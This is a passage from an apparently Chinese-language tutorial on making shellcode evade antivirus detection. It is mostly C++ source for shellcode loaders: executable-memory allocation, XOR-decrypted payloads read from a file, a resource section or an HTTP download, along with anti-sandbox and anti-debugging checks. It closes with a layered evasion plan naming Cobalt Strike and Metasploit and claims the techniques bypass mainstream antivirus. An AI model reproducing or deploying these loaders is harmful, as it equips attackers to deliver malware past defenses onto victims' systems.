\|<\/span> MEM_RESERVE, PAGE_EXECUTE_READWRITE); <\/span><\/span> memcpy(execMem, shellcode, size); <\/span><\/span> ((void<\/span>(<\/span>)())execMem)(); <\/span><\/span> VirtualFree(execMem, 0<\/span>, MEM_RELEASE); <\/span><\/span>} <\/span><\/span><\/code><\/pre>五、Shellcode分离技术<\/h2> 5.1 文件分离<\/h3> #include<\/span> <fstream><\/span> <\/span><\/span><\/span>#include<\/span> <Windows.h><\/span> <\/span><\/span><\/span><\/span> <\/span><\/span>void<\/span> load<\/span>(char<\/span><\/span> buf, int<\/span> size) { <\/span><\/span> char<\/span><\/span> shellcode =<\/span> (char<\/span><\/span>)VirtualAlloc(NULL, size, MEM_COMMIT, PAGE_EXECUTE_READWRITE); <\/span><\/span> CopyMemory(shellcode, buf, size); <\/span><\/span> CreateThread(NULL, NULL, (LPTHREAD_START_ROUTINE)shellcode, NULL, NULL, NULL); <\/span><\/span>} <\/span><\/span> <\/span><\/span>int<\/span> main<\/span>() { <\/span><\/span> ifstream infile("p64.bin"<\/span>, ios::<\/span>binary); <\/span><\/span> infile.seekg(0<\/span>, infile.end); <\/span><\/span> int<\/span> length =<\/span> infile.tellg(); <\/span><\/span> infile.seekg(0<\/span>, infile.beg); <\/span><\/span> <\/span><\/span> char<\/span><\/span> data =<\/span> new<\/span> char<\/span>[length]; <\/span><\/span> infile.read(data, length); <\/span><\/span> <\/span><\/span> \/\/ 解密 <\/span><\/span><\/span><\/span> for<\/span> (int<\/span> i =<\/span> 0<\/span>; i <<\/span> length; i++<\/span>) { <\/span><\/span> data[i] ^=<\/span> 0x39<\/span>; <\/span><\/span> } <\/span><\/span> <\/span><\/span> load(data, length); <\/span><\/span> return<\/span> 0<\/span>; <\/span><\/span>} <\/span><\/span><\/code><\/pre>5.2 HTTP请求分离<\/h3> #include<\/span> <winhttp.h><\/span> <\/span><\/span><\/span>#pragma comment(lib, "winhttp.lib") <\/span><\/span><\/span><\/span> <\/span><\/span>vector<<\/span>unsigned<\/span> char<\/span>><\/span> DownloadData(const<\/span> wchar_t<\/span><\/span> host, int<\/span> port, const<\/span> wchar_t<\/span><\/span> path) { <\/span><\/span> HINTERNET hSession =<\/span> WinHttpOpen(L<\/span>"WinHTTP Example\/1.0"<\/span>, <\/span><\/span> WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, <\/span><\/span> WINHTTP_NO_PROXY_NAME, <\/span><\/span> WINHTTP_NO_PROXY_BYPASS, 0<\/span>); <\/span><\/span> <\/span><\/span> HINTERNET hConnect =<\/span> WinHttpConnect(hSession, host, port, 0<\/span>); <\/span><\/span> HINTERNET hRequest =<\/span> WinHttpOpenRequest(hConnect, L<\/span>"GET"<\/span>, path, NULL, <\/span><\/span> WINHTTP_NO_REFERER, <\/span><\/span> WINHTTP_DEFAULT_ACCEPT_TYPES, 0<\/span>); <\/span><\/span> <\/span><\/span> WinHttpSendRequest(hRequest, WINHTTP_NO_ADDITIONAL_HEADERS, 0<\/span>, <\/span><\/span> WINHTTP_NO_REQUEST_DATA, 0<\/span>, 0<\/span>, 0<\/span>); <\/span><\/span> WinHttpReceiveResponse(hRequest, NULL); <\/span><\/span> <\/span><\/span> vector<<\/span>unsigned<\/span> char<\/span>><\/span> result; <\/span><\/span> DWORD dwSize =<\/span> 0<\/span>; <\/span><\/span> do<\/span> { <\/span><\/span> WinHttpQueryDataAvailable(hRequest, &<\/span>dwSize); <\/span><\/span> vector<<\/span>unsigned<\/span> char<\/span>><\/span> buffer(dwSize); <\/span><\/span> DWORD dwDownloaded =<\/span> 0<\/span>; <\/span><\/span> WinHttpReadData(hRequest, buffer.data(), dwSize, &<\/span>dwDownloaded); <\/span><\/span> result.insert(result.end(), buffer.begin(), buffer.begin() +<\/span> dwDownloaded); <\/span><\/span> } while<\/span> (dwSize ><\/span> 0<\/span>); <\/span><\/span> <\/span><\/span> WinHttpCloseHandle(hRequest); <\/span><\/span> WinHttpCloseHandle(hConnect); <\/span><\/span> WinHttpCloseHandle(hSession); <\/span><\/span> return<\/span> result; <\/span><\/span>} <\/span><\/span><\/code><\/pre>5.3 参数传递分离<\/h3> int<\/span> main<\/span>(int<\/span> argc, char<\/span><\/span> argv[]) { <\/span><\/span> if<\/span> (argc <<\/span> 2<\/span>) { <\/span><\/span> printf("Usage: %s <shellcode_file><\/span>\n<\/span>"<\/span>, argv[0<\/span>]); <\/span><\/span> return<\/span> 1<\/span>; <\/span><\/span> } <\/span><\/span> <\/span><\/span> ifstream infile(argv[1<\/span>], ios::<\/span>binary); <\/span><\/span> \/\/ ... 读取和解密过程与文件分离相同 <\/span><\/span><\/span><\/span>} <\/span><\/span><\/code><\/pre>六、反沙箱与反调试技术<\/h2> 6.1 反沙箱检测<\/h3> bool<\/span> detect_sandbox<\/span>() { <\/span><\/span> \/\/ 时间差检测 <\/span><\/span><\/span><\/span> auto<\/span> start =<\/span> chrono::<\/span>high_resolution_clock::<\/span>now(); <\/span><\/span> this_thread::<\/span>sleep_for(chrono::<\/span>milliseconds(100<\/span>)); <\/span><\/span> auto<\/span> end =<\/span> chrono::<\/span>high_resolution_clock::<\/span>now(); <\/span><\/span> auto<\/span> elapsed =<\/span> chrono::<\/span>duration_cast<<\/span>chrono::<\/span>milliseconds><\/span>(end -<\/span> start); <\/span><\/span> if<\/span> (elapsed.count() <<\/span> 100<\/span>) return<\/span> true; <\/span><\/span> <\/span><\/span> \/\/ 内存检测 <\/span><\/span><\/span><\/span> MEMORYSTATUSEX statex; <\/span><\/span> statex.dwLength =<\/span> sizeof<\/span>(statex); <\/span><\/span> GlobalMemoryStatusEx(&<\/span>statex); <\/span><\/span> SYSTEM_INFO systemInfo; <\/span><\/span> GetSystemInfo(&<\/span>systemInfo); <\/span><\/span> if<\/span> (statex.ullTotalPageFile \/<\/span> systemInfo.dwPageSize <<\/span> 4000000<\/span>) return<\/span> true; <\/span><\/span> <\/span><\/span> \/\/ CPU核心数检测 <\/span><\/span><\/span><\/span> if<\/span> (systemInfo.dwNumberOfProcessors <=<\/span> 4<\/span>) return<\/span> true; <\/span><\/span> <\/span><\/span> \/\/ 网络适配器检测 <\/span><\/span><\/span><\/span> PIP_ADAPTER_ADDRESSES pAddresses =<\/span> (PIP_ADAPTER_ADDRESSES)new<\/span> BYTE[15000<\/span>]; <\/span><\/span> if<\/span> (GetAdaptersAddresses(AF_UNSPEC, GAA_FLAG_INCLUDE_PREFIX, <\/span><\/span> NULL, pAddresses, 15000<\/span>) ==<\/span> ERROR_SUCCESS) { <\/span><\/span> int<\/span> numAdapters =<\/span> 0<\/span>; <\/span><\/span> while<\/span> (pAddresses) { <\/span><\/span> if<\/span> (pAddresses-><\/span>OperStatus ==<\/span> IfOperStatusUp) numAdapters++<\/span>; <\/span><\/span> pAddresses =<\/span> pAddresses-><\/span>Next; <\/span><\/span> } <\/span><\/span> if<\/span> (numAdapters <<\/span> 2<\/span>) return<\/span> true; <\/span><\/span> } <\/span><\/span> <\/span><\/span> return<\/span> false; <\/span><\/span>} <\/span><\/span><\/code><\/pre>6.2 反调试技术<\/h3> int<\/span> main<\/span>() { <\/span><\/span> \/\/ 调试器检测 <\/span><\/span><\/span><\/span> if<\/span> (IsDebuggerPresent()) return<\/span> 1<\/span>; <\/span><\/span> <\/span><\/span> \/\/ 远程调试检测 <\/span><\/span><\/span><\/span> BOOL bDebuggerPresent =<\/span> FALSE; <\/span><\/span> if<\/span> (CheckRemoteDebuggerPresent(GetCurrentProcess(), &<\/span>bDebuggerPresent) &&<\/span> bDebuggerPresent) <\/span><\/span> return<\/span> 1<\/span>; <\/span><\/span> <\/span><\/span> \/\/ 远程桌面检测 <\/span><\/span><\/span><\/span> if<\/span> (GetSystemMetrics(SM_REMOTESESSION) !=<\/span> 0<\/span>) return<\/span> 1<\/span>; <\/span><\/span> <\/span><\/span> \/\/ 时间戳计数器检测 <\/span><\/span><\/span><\/span> unsigned<\/span> __int64<\/span> start =<\/span> __rdtsc(); <\/span><\/span> Sleep(100<\/span>); <\/span><\/span> unsigned<\/span> __int64<\/span> end =<\/span> __rdtsc(); <\/span><\/span> if<\/span> ((end -<\/span> start) ><\/span> 100000000<\/span>) return<\/span> 1<\/span>; <\/span><\/span> <\/span><\/span> \/\/ 正常执行代码... <\/span><\/span><\/span><\/span>} <\/span><\/span><\/code><\/pre>七、资源节加载技术<\/h2> #include<\/span> "resource.h"<\/span> <\/span><\/span><\/span><\/span> <\/span><\/span>int<\/span> main<\/span>() { <\/span><\/span> \/\/ 查找资源 <\/span><\/span><\/span><\/span> HRSRC res =<\/span> FindResource(NULL, MAKEINTRESOURCE(IDR_SC1), L<\/span>"sc"<\/span>); <\/span><\/span> HGLOBAL resData =<\/span> LoadResource(NULL, res); <\/span><\/span> DWORD size =<\/span> SizeofResource(NULL, res); <\/span><\/span> <\/span><\/span> \/\/ 分配内存 <\/span><\/span><\/span><\/span> LPSTR shell =<\/span> (LPSTR)VirtualAlloc(0<\/span>, size, MEM_COMMIT, PAGE_READWRITE); <\/span><\/span> memcpy(shell, resData, size); <\/span><\/span> <\/span><\/span> \/\/ 解密 <\/span><\/span><\/span><\/span> for<\/span> (int<\/span> i =<\/span> 0<\/span>; i <<\/span> size; i++<\/span>) { <\/span><\/span> shell[i] ^=<\/span> 0x39<\/span>; <\/span><\/span> } <\/span><\/span> <\/span><\/span> \/\/ 执行 <\/span><\/span><\/span><\/span> VirtualProtect(shell, size, PAGE_EXECUTE_READ, &<\/span>oldProtect); <\/span><\/span> ((void<\/span>(*<\/span>)(void<\/span>)) shell)(); <\/span><\/span>} <\/span><\/span><\/code><\/pre>八、综合免杀方案设计<\/h2> 多层加密<\/strong>：XOR+AES组合加密<\/li> 分离加载<\/strong>：通过网络或文件分离Shellcode<\/li> 反检测<\/strong>：集成反沙箱和反调试技术<\/li> 合法程序模仿<\/strong>：使用系统API作为加载入口点<\/li> 行为混淆<\/strong>：添加无害API调用干扰行为分析<\/li> <\/ol> 九、工具与资源<\/h2> 开发工具<\/strong>：<\/p> Visual Studio（配置绕过360QVM）<\/li> Ollydbg（分析Shellcode）<\/li> 010 Editor（二进制编辑）<\/li> <\/ul> <\/li> C2框架<\/strong>：<\/p> Cobalt Strike<\/li> Metasploit<\/li> Viper\/Ghost<\/li> <\/ul> <\/li> 检测平台<\/strong>：<\/p> 微步在线云沙箱<\/li> VirusTotal<\/li> <\/ul> <\/li> <\/ol> 十、注意事项<\/h2> 编译时选择正确的平台（x86\/x64）<\/li> 测试时关闭杀软实时防护<\/li> 不同杀软组合测试<\/li> 虚拟机与物理机环境差异<\/li> 网络通信行为隐蔽性<\/li> <\/ol> 通过以上技术的组合应用，可以有效提高Shellcode的免杀能力，绕过主流杀毒软件的检测。实际应用中应根据目标环境灵活调整技术方案。<\/p>